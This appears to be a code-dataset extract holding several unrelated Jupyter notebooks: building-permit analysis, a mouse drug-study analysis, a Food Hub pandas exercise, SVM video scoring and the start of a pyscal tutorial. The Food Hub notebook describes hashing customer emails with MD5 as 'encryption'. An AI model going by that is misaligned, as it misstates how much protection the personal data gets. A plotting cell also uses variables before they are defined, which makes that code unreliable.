"## Solution Notebook\n\nReview the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/linked_lists/kth_to_last_elem/kth_to_last_elem_solution.ipynb) for a discussion on algorithms and code solutions.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb535ca62125f224fb9d1837b8b473c17ac56a61 | 418,124 | ipynb | Jupyter Notebook | additional_reference_notebooks/alec_calm_down.ipynb | hud-capstone/Data-and-Urban-Development | c27a900c7594f87aa8f3abd0d911484d1b331bb4 | [
"Unlicense"
] | null | null | null | additional_reference_notebooks/alec_calm_down.ipynb | hud-capstone/Data-and-Urban-Development | c27a900c7594f87aa8f3abd0d911484d1b331bb4 | [
"Unlicense"
] | null | null | null | additional_reference_notebooks/alec_calm_down.ipynb | hud-capstone/Data-and-Urban-Development | c27a900c7594f87aa8f3abd0d911484d1b331bb4 | [
"Unlicense"
] | null | null | null | 41.300277 | 138 | 0.262795 | [
[
[
"# import data science libraries\nimport numpy as np\nimport pandas as pd\n\nimport re\n\nimport os.path\nfrom os import path\n\nfrom datetime import datetime\n\n%matplotlib inline\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom scipy import stats\n\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, PowerTransformer\nfrom sklearn.cluster import KMeans\n\nimport wrangle as wr\nimport preprocessing_permits as pr\nimport explore as ex\nimport model as mo\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")",
"_____no_output_____"
],
[
"# global setting for DataFrames and visualizations\npd.set_option(\"display.max_columns\", None)\nplt.rc(\"figure\", figsize=(16, 8))\nsns.set_palette(\"colorblind\")",
"_____no_output_____"
],
[
"df = wr.acquire_building_permits()\nprint(f\"\"\"Our DataFrame contains {df.shape[0]:,} observations and {df.shape[1]} features.\"\"\")\ndf",
"Our DataFrame contains 8,382 observations and 29 features.\n"
],
[
"df[\"city\"] = df.cbsa_name.str.split(\" \", 1, expand = True)[0]\n \ndf[\"state\"] = df.cbsa_name.str.split(\" \", 1, expand = True)[1]\n\ndf[\"major_city\"] = df.city.str.split(\"-\", 1, expand=True)[0]\n\ndf[\"major_state\"] = df.state.str.split(\"-\", 1, expand=True)[0]\n\ndf[\"metropolitan_area\"] = df.state.str.split(\"-\", 1, expand=True)[1]\n\ndf[\"metropolitan_area\"] = df.major_state.str.split(\" \", 1, expand=True)[1]\n\ndf[\"major_state\"] = df.major_state.str.split(\" \", 1, expand=True)[0]",
"_____no_output_____"
],
[
"df[(df.major_city == \"York\") & (df.major_state == \"PA\")]",
"_____no_output_____"
],
[
"df = wr.prep_building_permits(df)\nprint(f\"\"\"Our DataFrame contains {df.shape[0]:,} observations and {df.shape[1]} features.\"\"\")\ndf",
"Our DataFrame contains 8,269 observations and 30 features.\n"
],
[
"df[(df.major_city == \"York\") & (df.major_state == \"PA\")]",
"_____no_output_____"
],
[
"df[(df.major_city == \"Baltimore\") & (df.major_state == \"MD\")]",
"_____no_output_____"
],
[
"df.head(46)",
"_____no_output_____"
],
[
"df = pr.get_permits_model_df()\nprint(f\"\"\"Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features\"\"\")\ndf.head(46)",
"Our modeling DataFrame contains 8,269 observations & 6 features\n"
],
[
"df[\"alec_test\"] = (\n df.sort_values([\"year\"])\n .groupby([\"city\", \"state\"])[[\"total_high_density_value\"]]\n .pct_change()\n)",
"_____no_output_____"
],
[
"df.tail(46)",
"_____no_output_____"
],
[
"df[\"new_field\"] = df.sort_values([\"year\"]).groupby([\"city\", \"state\", \"year\"])[[\"total_high_density_value\"]].pct_change()",
"_____no_output_____"
],
[
"(7485000.0 - 4566000.0) / 4566000.0",
"_____no_output_____"
],
[
"(12492000.0 - 30583000.0) / 30583000.0",
"_____no_output_____"
],
[
"(1 + 2.034637) / (1 + 0.231085)",
"_____no_output_____"
],
[
"df = pr.add_new_features(df)\nprint(f\"\"\"Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features\"\"\")\ndf.head(46)",
"Our modeling DataFrame contains 8,269 observations & 17 features\n"
],
[
"(1 + -0.379118) / (1 + 0.062322)",
"_____no_output_____"
],
[
"df.groupby(\"year\").total_high_density_value.sum()",
"_____no_output_____"
],
[
"df.sample()",
"_____no_output_____"
],
[
"df.iloc[545:550]",
"_____no_output_____"
],
[
"(4.928300e+10 - 5.200240e+10) / 5.200240e+10",
"_____no_output_____"
],
[
"(217714000 - 473328000.0) / 473328000.0",
"_____no_output_____"
],
[
"(1 + 0.578019) / (1 + 0.313639)",
"_____no_output_____"
],
[
"df = pr.filter_top_cities_building_permits(df)\nprint(f\"\"\"Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features\"\"\")\ndf.tail()",
"Our modeling DataFrame contains 2,990 observations & 18 features\n"
],
[
"(4.928300e+10 - 5.200240e+10) / 5.200240e+10",
"_____no_output_____"
],
[
"(1 + -0.508320) / (1 + -0.052294)",
"_____no_output_____"
],
[
"df.groupby(\"year\").total_high_density_value.sum()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53667512c405ce2db8490a65e4532240d8f74a | 133,461 | ipynb | Jupyter Notebook | Pymaceuticals/pymaceuticals_starter.ipynb | JulietChristine/matplotlib-challenge | bca125d45549f56a098b39e20aa6837b56c2fe1f | [
"ADSL"
] | null | null | null | Pymaceuticals/pymaceuticals_starter.ipynb | JulietChristine/matplotlib-challenge | bca125d45549f56a098b39e20aa6837b56c2fe1f | [
"ADSL"
] | null | null | null | Pymaceuticals/pymaceuticals_starter.ipynb | JulietChristine/matplotlib-challenge | bca125d45549f56a098b39e20aa6837b56c2fe1f | [
"ADSL"
] | null | null | null | 93.199022 | 16,492 | 0.776661 | [
[
[
"## Observations and Insights ",
"_____no_output_____"
]
],
[
[
"# Dependencies and Setup\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy.stats as st\nimport numpy as np\nfrom scipy.stats import linregress\n# Study data files\nmouse_metadata_path = \"data/Mouse_metadata.csv\"\nstudy_results_path = \"data/Study_results.csv\"\n\n# Read the mouse data and the study results\nmouse_metadata = pd.read_csv(mouse_metadata_path)\nstudy_results = pd.read_csv(study_results_path)",
"_____no_output_____"
],
[
"#looking at the data\n# mouse_metadata.head(20)\n# study_results.head(20)\n#putting data together\nall_mouse_data = mouse_metadata.merge(study_results, on='Mouse ID')\nall_mouse_data.head()",
"_____no_output_____"
],
[
"# Checking the number of mice.\nmouse_count = len(all_mouse_data[\"Mouse ID\"].unique())\nmouse_count",
"_____no_output_____"
],
[
"# Getting the duplicate mice by ID number that shows up for Mouse ID and Timepoint. \nall_dups = len(all_mouse_data[\"Mouse ID\"])- mouse_count\nall_dups",
"_____no_output_____"
],
[
"# Optional: Get all the data for the duplicate mouse ID.\nall_counts = all_dups + mouse_count\nall_counts",
"_____no_output_____"
],
[
"# Find the duplicate mouse\nduplicate_mouse = all_mouse_data.loc[all_mouse_data.duplicated(subset=['Mouse ID', 'Timepoint']), 'Mouse ID'].unique()\nduplicate_mouse[0]",
"_____no_output_____"
],
[
"# Create a clean DataFrame by dropping the duplicate mouse by its ID.\nanalysis_df = all_mouse_data[all_mouse_data['Mouse ID'].isin(duplicate_mouse) == False]\nanalysis_df.head()",
"_____no_output_____"
],
[
"# Checking the number of mice in the clean DataFrame.\nmouse_count2 = len(analysis_df[\"Mouse ID\"].unique())\nmouse_count2",
"_____no_output_____"
]
],
[
[
"## Summary Statistics",
"_____no_output_____"
]
],
[
[
"# Generate a summary statistics table of mean, median, variance, standard deviation, and SEM of the tumor volume for each regimen\n\n# This method is the most straighforward, creating multiple series and putting them all together at the end.\nregimen_df = analysis_df.copy().groupby('Drug Regimen')\nmean = regimen_df.mean()['Tumor Volume (mm3)']\nmedian = regimen_df.median()['Tumor Volume (mm3)']\nvariance = regimen_df.var()['Tumor Volume (mm3)']\nstd_deviation = regimen_df.std()['Tumor Volume (mm3)']\nsem = regimen_df.sem()['Tumor Volume (mm3)']\n\nsummary_table = pd.DataFrame({\n 'Mean Volume': mean,\n 'Median Volume': median,\n 'Volume Variance': variance,\n 'Volume Std': std_deviation,\n 'Volume Std Err': sem\n})\nsummary_table",
"_____no_output_____"
],
[
"# Generate a summary statistics table of mean, median, variance, standard deviation, \n# and SEM of the tumor volume for each regimen\n# This method produces everything in a single groupby function\nanalysis_df.groupby('Drug Regimen').agg({\n 'Tumor Volume (mm3)': ['mean', 'median', 'var', 'std', 'sem']\n})",
"_____no_output_____"
]
],
[
[
"## Bar and Pie Charts",
"_____no_output_____"
]
],
[
[
"# Generate a bar plot showing the total number of mice for each treatment throughout the course of the study using pandas.\npandas_bar = analysis_df['Drug Regimen'].value_counts().plot(kind='bar', color = 'pink', title=\"Mouse Count Per Treatment\")",
"_____no_output_____"
],
[
"# Generate a bar plot showing the total number of mice for each treatment throughout the course of the study using pyplot.\nx_values = analysis_df['Drug Regimen'].unique()\nplt.bar(x=x_values, height=analysis_df['Drug Regimen'].value_counts().values, color=\"pink\", width=0.5)\nplt.xticks(rotation=90)\nplt.title(\"Mouse Count Per Treatment\")\nplt.show()",
"_____no_output_____"
],
[
"# Generate a pie plot showing the distribution of female versus male mice using pandas\ngender_dist = analysis_df['Sex'].value_counts()\ngender_pie = gender_dist.plot(kind='pie', colors = [\"purple\", \"pink\"], title= \"Gender Distibution\", legend=True)",
"_____no_output_____"
],
[
"# Generate a pie plot showing the distribution of female versus male mice using pyplot\ngender_counts = analysis_df['Sex'].value_counts()\nplt.pie(gender_counts, labels=gender_dist.index, colors=[\"purple\", \"pink\"])\nplt.title('Gender Distribution')\nplt.legend()\nplt.ylabel(\"Sex\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Quartiles, Outliers and Boxplots",
"_____no_output_____"
]
],
[
[
"# Start by getting the last (greatest) timepoint for each mouse\n# Using reset_index will return the series as a dataframe\nmax_df = analysis_df.groupby('Mouse ID')['Timepoint'].max().reset_index()\nmax_df",
"_____no_output_____"
],
[
"# Merge this group df with the original dataframe to get the tumor volume at the last timepoint\nmax_merge = analysis_df.merge(max_df, on=['Mouse ID', 'Timepoint'])",
"_____no_output_____"
],
[
"max_merge",
"_____no_output_____"
],
[
"# Put treatments into a list for for loop (and later for plot labels)\ntreatments = [\"Capomulin\", \"Ramicane\", \"Infubinol\", \"Ceftamin\"]\n# Create empty list to fill with tumor vol data (for plotting)\n\ntumor_vol = []\n# Calculate the IQR and quantitatively determine if there are any potential outliers.\n # Locate the rows which contain mice on each drug and get the tumor volumes\n # Determine outliers using upper and lower bounds\nfor treatment in treatments:\n final_volume = (max_merge.loc[max_merge[\"Drug Regimen\"]== treatment, \"Tumor Volume (mm3)\"])\n quartiles = np.quantile(final_volume, [0.25, 0.50, 0.75])\n lowerq = quartiles[0]\n higherq = quartiles[2]\n median = quartiles[1]\n iqr = higherq - lowerq\n lower_bound = lowerq - (1.5 * iqr)\n upper_bound = higherq + (1.5 * iqr)\n print(f'Quartile Data for {treatment}:')\n print(\"------------------------------------------\")\n print(f'Lower Quartile of Tumor Volumes: {round(lowerq, 2)}')\n print(f'Upper Quartile of Tumor Volmes: {round(higherq, 2)}')\n print(f'Inner Quartile Range is: {round(iqr, 2)}')\n print(f'Values below {round(lower_bound, 2)} could be outliers, and values above {round(upper_bound, 2)} could be outliers')\n print(\"------------------------------------------\")\n tumor_vol.append(final_volume)",
"Quartile Data for Capomulin:\n------------------------------------------\nLower Quartile of Tumor Volumes: 32.38\nUpper Quartile of Tumor Volmes: 40.16\nInner Quartile Range is: 7.78\nValues below 20.7 could be outliers, and values above 51.83 could be outliers\n------------------------------------------\nQuartile Data for Ramicane:\n------------------------------------------\nLower Quartile of Tumor Volumes: 31.56\nUpper Quartile of Tumor Volmes: 40.66\nInner Quartile Range is: 9.1\nValues below 17.91 could be outliers, and values above 54.31 could be outliers\n------------------------------------------\nQuartile Data for Infubinol:\n------------------------------------------\nLower Quartile of Tumor Volumes: 54.05\nUpper Quartile of Tumor Volmes: 65.53\nInner Quartile Range is: 11.48\nValues below 36.83 could be outliers, and values above 82.74 could be outliers\n------------------------------------------\nQuartile Data for Ceftamin:\n------------------------------------------\nLower Quartile of Tumor Volumes: 48.72\nUpper Quartile of Tumor Volmes: 64.3\nInner Quartile Range is: 15.58\nValues below 25.36 could be outliers, and values above 87.67 could be outliers\n------------------------------------------\n"
],
[
"# Generate a box plot of the final tumor volume of each mouse across four regimens of interest\npink_square = dict(markerfacecolor='pink', marker='s')\nfig, ax1 = plt.subplots()\nax1.set_title(\"Tumor Volume Across Four Regimens of Interest\")\nax1.set_ylabel(\"Volume\")\nax1.set_xlabel(\"Treatments\")\nax1.boxplot(tumor_vol, flierprops=pink_square )\nax1.set_xticklabels([\"Capomulin\", \"Ramicane\", \"Infubinol\", \"Ceftamin\"])\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Line and Scatter Plots",
"_____no_output_____"
]
],
[
[
"rando_mouse_df = analysis_df.loc[analysis_df['Drug Regimen']== \"Capomulin\",:]\nrando_mouse_df = rando_mouse_df.loc[rando_mouse_df[\"Mouse ID\"]==\"s185\",:]\n# Generate a line plot of time point versus tumor volume for a mouse treated with Capomulin\nplt.plot(rando_mouse_df[\"Tumor Volume (mm3)\"], rando_mouse_df[\"Timepoint\"], marker = \"o\", color=\"purple\")\nplt.xlabel('Average Tumor Volume')\nplt.ylabel('Timepoints')\nplt.title(\"Tumor Volume vs Time for Mouse s185\")\nplt.show()",
"_____no_output_____"
],
[
"# Generate a scatter plot of mouse weight versus average tumor volume for the Capomulin regimen\ncapomulin_df = analysis_df.copy().loc[analysis_df['Drug Regimen']== \"Capomulin\",:]\ncapomulin_df = capomulin_df.groupby(\"Mouse ID\")\navg_vol = capomulin_df[\"Tumor Volume (mm3)\"].mean()\nmouse_weight = capomulin_df[\"Weight (g)\"].unique().astype(int)\n\nplt.scatter(avg_vol, mouse_weight, color=\"hotpink\")\nplt.xlabel('Average Tumor Volume')\nplt.ylabel('Mouse Weight (g)')\nplt.plot(x_values,regress_values,\"r-\", color='purple')\nplt.title(\"Tumor Volume vs Weight\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Correlation and Regression",
"_____no_output_____"
]
],
[
[
"# Calculate the correlation coefficient and linear regression model \n# for mouse weight and average tumor volume for the Capomulin regimen\nx_values = avg_vol\ny_values = mouse_weight\n(slope, intercept, rvalue, pvalue, stderr) = linregress(x_values, y_values)\nregress_values = x_values * slope + intercept\nline_eq = \"y = \" + str(round(slope,2)) + \"x + \" + str(round(intercept,2))\ncorrelation = st.pearsonr(avg_vol, mouse_weight)\nprint(f'The equation of the line is {line_eq}, and the correlation coefficient is {round(correlation[0],2)}.')\nprint('This indicates a strong relationship between weight and tumor volume.')",
"The equation of the line is y = 0.74x + -10.15, and the correlation coefficient is 0.84.\nThis indicates a strong relationship between weight and tumor volume.\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb536d2c023d66b5799dcd838c1b6f70620aca54 | 59,388 | ipynb | Jupyter Notebook | Food Hub Coding Test.ipynb | manjunath0007/Food-Hub | 9fbb20e08a894871d0573ac58d7ffcf2b7bd6b89 | [
"MIT"
] | null | null | null | Food Hub Coding Test.ipynb | manjunath0007/Food-Hub | 9fbb20e08a894871d0573ac58d7ffcf2b7bd6b89 | [
"MIT"
] | null | null | null | Food Hub Coding Test.ipynb | manjunath0007/Food-Hub | 9fbb20e08a894871d0573ac58d7ffcf2b7bd6b89 | [
"MIT"
] | null | null | null | 35.20332 | 134 | 0.350155 | [
[
[
"# importing the packages\nimport pandas as pd\nimport numpy as np",
"_____no_output_____"
],
[
"# reading the csv files\norders = pd.read_csv('orders_test (2).csv')\nstores = pd.read_csv('store_test (2).csv')\ncustomers = pd.read_csv('customer_test (2).csv')",
"_____no_output_____"
]
],
[
[
"1. Create a CSV containing an aggregate table showing the total orders and revenue\neach store had each month. It should have the following columns:\n\nYear (Eg: 2020)\n\nMonth (Eg: January)\n\nStore Name\n\nNumber of Orders\n\nTotal Revenue\n",
"_____no_output_____"
]
],
[
[
"# renaming, creating, merging columns as per required output\nstores.rename(columns={'id':'store_id'},inplace=True)\norders['order_date'] = pd.to_datetime(orders['order_date'])\norders['Year'] = orders['order_date'].apply(lambda x : x.strftime('%Y'))\norders['Month'] = orders['order_date'].apply(lambda x : x.strftime('%B'))\nstore_orders = stores.merge(orders, on=['store_id'], how = 'left')",
"_____no_output_____"
],
[
"store_orders.groupby(['name','Year','Month']).agg({'id':'count','total':'sum'}).reset_index().rename(columns={\n 'name':'Store Name','id':'Number of Orders','total':'Total revenue'})",
"_____no_output_____"
],
[
"# storing the csv for question 1 reesults\nQ1 = store_orders.groupby(['name','Year','Month']).agg({'id':'count','total':'sum'}).reset_index().rename(columns={\n 'name':'Store Name','id':'Number of Orders','total':'Total revenue'})\nQ1.to_csv('Q1.csv')",
"_____no_output_____"
]
],
[
[
"2. Create a CSV containing a list of users who have placed less than 10 orders. It should have the following columns:\n\nFirst Name\n\nLast Name\n\nEmail\n\nOrders Placed by user\n",
"_____no_output_____"
]
],
[
[
"# renaming, merging columns as per required output\ncustomers.rename(columns={'id':'customer_id'},inplace=True)\ncustomer_orders = customers.merge(orders,on='customer_id',how='left')\ncustomers_with_orders = customer_orders.groupby(['first_name','last_name','email']).agg({'id':'count'}).reset_index().rename(\n columns={'first_name':'First Name','last_name':'Last Name','email':'Email','id':'Orders Placed by user'})",
"_____no_output_____"
],
[
"# pulling customer info who has ordered less than 10 orders\ncustomers_with_lt_10_orders = customers_with_orders[customers_with_orders['Orders Placed by user'] < 10]",
"_____no_output_____"
],
[
"customers_with_lt_10_orders",
"_____no_output_____"
],
[
"# saving the results of Q2\ncustomers_with_lt_10_orders.to_csv('Q2.csv')",
"_____no_output_____"
]
],
[
[
"3. In question 2, use a MD5 hash to encrypt the emails of the users before converting it to CSV.\n",
"_____no_output_____"
]
],
[
[
"# importing the hash library\nimport hashlib",
"_____no_output_____"
],
[
"# hasing the Email information of customer\ncustomers_with_lt_10_orders['Email']=customers_with_lt_10_orders.Email.apply(lambda x: hashlib.md5(x.encode()).hexdigest())",
"_____no_output_____"
],
[
"customers_with_lt_10_orders ",
"_____no_output_____"
],
[
"# stroing the customer order info with hashed Email information \ncustomers_with_lt_10_orders.to_csv('Q3.csv')",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb537b72b3f40830e1dfafb301f8c8429b44ec98 | 11,427 | ipynb | Jupyter Notebook | hw2_code/scripts/.ipynb_checkpoints/scores_canvas-checkpoint.ipynb | codinglara/11775-hws | 1af6f1458234ab2e44940fc78bd9134dc03a3f27 | [
"Apache-2.0"
] | null | null | null | hw2_code/scripts/.ipynb_checkpoints/scores_canvas-checkpoint.ipynb | codinglara/11775-hws | 1af6f1458234ab2e44940fc78bd9134dc03a3f27 | [
"Apache-2.0"
] | null | null | null | hw2_code/scripts/.ipynb_checkpoints/scores_canvas-checkpoint.ipynb | codinglara/11775-hws | 1af6f1458234ab2e44940fc78bd9134dc03a3f27 | [
"Apache-2.0"
] | null | null | null | 32.555556 | 114 | 0.581692 | [
[
[
"#!/bin/python\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport pickle\nimport sys\nimport scipy\nfrom pathlib import Path\nfrom collections import Counter\nimport random\nimport copy\n\n# Machine Learning libraries\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn import svm\nfrom sklearn import metrics\nfrom sklearn import preprocessing\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.metrics import average_precision_score\n\n#m_trn_file_path = \"../cnn_bow/cnn_trn.csv\"\n#m_val_file_path = \"../cnn_bow/cnn_val.csv\"\n#m_test_file_path = \"../cnn_bow/cnn_test.csv\"\n\nm_trn_file_path = \"../surf_bow/surf_1000_trn.csv\"\nm_val_file_path = \"../surf_bow/surf_1000_val.csv\"\nm_test_file_path = \"../surf_bow/surf_1000_test.csv\"",
"_____no_output_____"
],
[
"#a_train_df = pd.read_csv(a_trn_file_path, index_col='Unnamed: 0')\n#a_train_df.drop(['target', 'name'], axis=1, inplace=True)\n\nm_train_df = pd.read_csv(m_trn_file_path, index_col='Unnamed: 0')\nm_train_df.drop(['name'], axis=1, inplace=True)\n\ntrain_df = m_train_df\ntrain_df.target.fillna('P000', inplace=True)\ntrain_df.fillna(0.0, inplace=True)\n\n### tf_idf conversion\n\n# 1. Save target column, and drop if from dataframe\ntrain_df_target = pd.DataFrame(train_df['target'], columns=['target'])\ntrain_df.drop(['target'], axis=1, inplace=True )\n\n# 2. Replace frequencies with tf_idf scores\ntf_transformer = TfidfTransformer(use_idf=True).fit(train_df)\nX_train_tf = tf_transformer.transform(train_df)\ntrain_df = pd.DataFrame(X_train_tf.todense(), columns=train_df.columns.values)\n\n# 3. Add back the target column\ntrain_df = pd.concat([train_df, train_df_target], axis=1)\n\n#a_test_df = pd.read_csv(a_val_file_path, index_col='Unnamed: 0')\n#a_test_df.drop(['target', 'name'], axis=1, inplace=True)\nm_test_df = pd.read_csv(m_val_file_path, index_col='Unnamed: 0')\nm_test_df.drop(['name'], axis=1, inplace=True )\n#test_df = pd.concat([a_test_df, m_test_df], axis=1)\n\ntest_df = m_test_df\ntest_df.target.fillna('P000', inplace=True)\ntest_df.fillna(0.0, inplace=True)\n\n### tf_idf conversion\n\n# 1. Save target column, and drop if from dataframe\ntest_df_target = pd.DataFrame(test_df['target'], columns=['target'])\ntest_df.drop(['target'], axis=1, inplace=True )\n\n# 2. Replace frequencies with tf_idf scores\ntf_transformer = TfidfTransformer(use_idf=True).fit(test_df)\nX_train_tf = tf_transformer.transform(test_df)\ntest_df = pd.DataFrame(X_train_tf.todense(), columns=test_df.columns.values)\n\n# 3. Add back the target column\ntest_df = pd.concat([test_df, test_df_target], axis=1)\n\n# Machine Learning\nprediction_var = list(train_df.columns)\nprediction_var.remove('target')\n#prediction_var.remove('name')\n\n# Get input training data\ntrain_X = train_df[prediction_var]\n\n# Get input target variable\ntrain_y = train_df.target\n\nprint(train_X.shape)\nprint(train_y.shape)",
"(834, 1000)\n(834,)\n"
],
[
"# Machine Learning\nprediction_var = list(test_df.columns)\nprediction_var.remove('target')\n\n# Get test data feature\ntest_X = test_df[prediction_var]\n\n# Get test data target\ntest_y = test_df.target\n\nprint(test_X.shape)\nprint(test_y.shape)",
"(398, 1000)\n(398,)\n"
],
[
"# class_weight='balanced',decision_function_shape = 'ovr',\n\ndict_weights = {'P000':0.0000001, 'P001': 97, 'P002': 24, 'P003': 54}\n\nclf = svm.SVC(gamma='scale', probability=True, class_weight=dict_weights,decision_function_shape = 'ovr')\n\n# Fit the model to training\nclf.fit(train_X,train_y)\n\n# Check prediction accuracy\nprediction = clf.decision_function(test_X)\n\nprob_list = prediction[:,1]\nx = np.array([test_y == 'P001'][0]).astype(int)\nprint('P001 &', round(average_precision_score(x,prob_list, pos_label=1),4))\n\nprob_list = prediction[:,2]\nx = np.array([test_y == 'P002'][0]).astype(int)\nprint('P002 &', round(average_precision_score(x,prob_list, pos_label=1),4))\n\nprob_list = prediction[:,3]\nx = np.array([test_y == 'P003'][0]).astype(int)\nprint('P003 &', round(average_precision_score(x,prob_list, pos_label=1),4))",
"P001 & 0.3215\nP002 & 0.4394\nP003 & 0.1098\n"
],
[
"# Train on validation also, for the Canvas submission\n\nm_train_df = pd.read_csv(m_trn_file_path, index_col='Unnamed: 0')\nm_train_df.drop(['name'], axis=1, inplace=True)\n\nm_test_df = pd.read_csv(m_val_file_path, index_col='Unnamed: 0')\nm_test_df.drop(['name'], axis=1, inplace=True )\n\ntrain_df = m_train_df\ntrain_df.target.fillna('P000', inplace=True)\ntrain_df.fillna(0.0, inplace=True)\n\ntest_df = m_test_df\ntest_df.target.fillna('P000', inplace=True)\ntest_df.fillna(0.0, inplace=True)\n\ntrain_df = train_df.append(test_df, ignore_index=True)\n\n### tf_idf conversion\n\n# 1. Save target column, and drop if from dataframe\ntrain_df_target = pd.DataFrame(train_df['target'], columns=['target'])\ntrain_df.drop(['target'], axis=1, inplace=True )\n\n# 2. Replace frequencies with tf_idf scores\ntf_transformer = TfidfTransformer(use_idf=True).fit(train_df)\nX_train_tf = tf_transformer.transform(train_df)\ntrain_df = pd.DataFrame(X_train_tf.todense(), columns=train_df.columns.values)\n\n# 3. Add back the target column\ntrain_df = pd.concat([train_df, train_df_target], axis=1)\n\n# Get input training data\ntrain_X = train_df[prediction_var]\n\n# Get input target variable\ntrain_y = train_df.target\n\nm_test_df = pd.read_csv(m_test_file_path, index_col='Unnamed: 0')\n\nname_list = m_test_df['name']\n\nm_test_df.drop(['name'], axis=1, inplace=True )\n\ntest_df = m_test_df\ntest_df.target.fillna('P000', inplace=True)\ntest_df.fillna(0.0, inplace=True)\n\n# Machine Learning\nprediction_var = list(test_df.columns)\nprediction_var.remove('target')\n\n# Get test data features\ntest_X = test_df[prediction_var]\n\n# Get test data target\ntest_y = test_df.target\n\nclf = svm.SVC(gamma='scale', probability=True, class_weight=dict_weights,decision_function_shape = 'ovr')\n\n# Fit the model to training\nclf.fit(train_X,train_y)\n\nwith open(\"../../all_test.video\", \"r\") as f:\n video_list = f.readlines()\n\n# Check prediction accuracy\nprediction = clf.decision_function(test_X)\n\nprob_list = prediction[:,1]\n\noutput_df = pd.DataFrame({\"VideoID\":name_list, \"Label\":prob_list})\noutput_df = output_df.set_index('VideoID')\ndict1 = output_df.to_dict('index')\nres = []\n\nfor line in video_list:\n vid = line.strip(\"\\n\")\n if(vid in dict1):\n res.append(dict1[vid]['Label'])\n else:\n res.append(0.0)\n\nres = pd.DataFrame(res, columns=None)\nres.to_csv(path_or_buf=\"../scores/\" + str('P001')+\"_cnn.csv\", index=False)\n\nprob_list = prediction[:,2]\noutput_df = pd.DataFrame({\"VideoID\":name_list, \"Label\":prob_list})\noutput_df = output_df.set_index('VideoID')\ndict1 = output_df.to_dict('index')\nres = []\n\nfor line in video_list:\n vid = line.strip(\"\\n\")\n if(vid in dict1):\n res.append(dict1[vid]['Label'])\n else:\n res.append(0.0)\n\nres = pd.DataFrame(res, columns=None)\nres.to_csv(path_or_buf=\"../scores/\" + str('P002')+\"_cnn.csv\", index=False)\n\nprob_list = prediction[:,3]\noutput_df = pd.DataFrame({\"VideoID\":name_list, \"Label\":prob_list})\noutput_df = output_df.set_index('VideoID')\ndict1 = output_df.to_dict('index')\nres = []\n\nfor line in video_list:\n vid = line.strip(\"\\n\")\n if(vid in dict1):\n res.append(dict1[vid]['Label'])\n else:\n res.append(0.0)\n\nres = pd.DataFrame(res, columns=None)\nres.to_csv(path_or_buf=\"../scores/\" + str('P003')+\"_cnn.csv\", index=False)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb537d5cb604295c4153ebc3252d472be9a37e22 | 10,485 | ipynb | Jupyter Notebook | pyscal/part3/05_distinguishing_solid_liquid.ipynb | srmnitc/pyscal-webpage | 451f7c5985a0cc1f1b99681641c79ba3a05ad444 | [
"BSD-3-Clause"
] | 2 | 2020-10-15T02:58:56.000Z | 2020-12-17T01:44:32.000Z | pyscal/part3/05_distinguishing_solid_liquid.ipynb | srmnitc/pyscal-webpage | 451f7c5985a0cc1f1b99681641c79ba3a05ad444 | [
"BSD-3-Clause"
] | 1 | 2021-01-31T01:10:08.000Z | 2021-01-31T04:49:34.000Z | pyscal/part3/05_distinguishing_solid_liquid.ipynb | srmnitc/pyscal-webpage | 451f7c5985a0cc1f1b99681641c79ba3a05ad444 | [
"BSD-3-Clause"
] | 1 | 2021-03-04T16:51:40.000Z | 2021-03-04T16:51:40.000Z | 27.664908 | 573 | 0.598093 | [
[
[
"## Distinction of solid liquid atoms and clustering ",
"_____no_output_____"
],
[
"In this example, we will take one snapshot from a molecular dynamics simulation which has a solid cluster in liquid. The task is to identify solid atoms and cluster them. More details about the method can be found [here](https://pyscal.readthedocs.io/en/latest/solidliquid.html).\n\nThe first step is, of course, importing all the necessary module. For visualisation, we will use [Ovito](https://www.ovito.org/).",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"The above image shows a visualisation of the system using Ovito. Importing modules,",
"_____no_output_____"
]
],
[
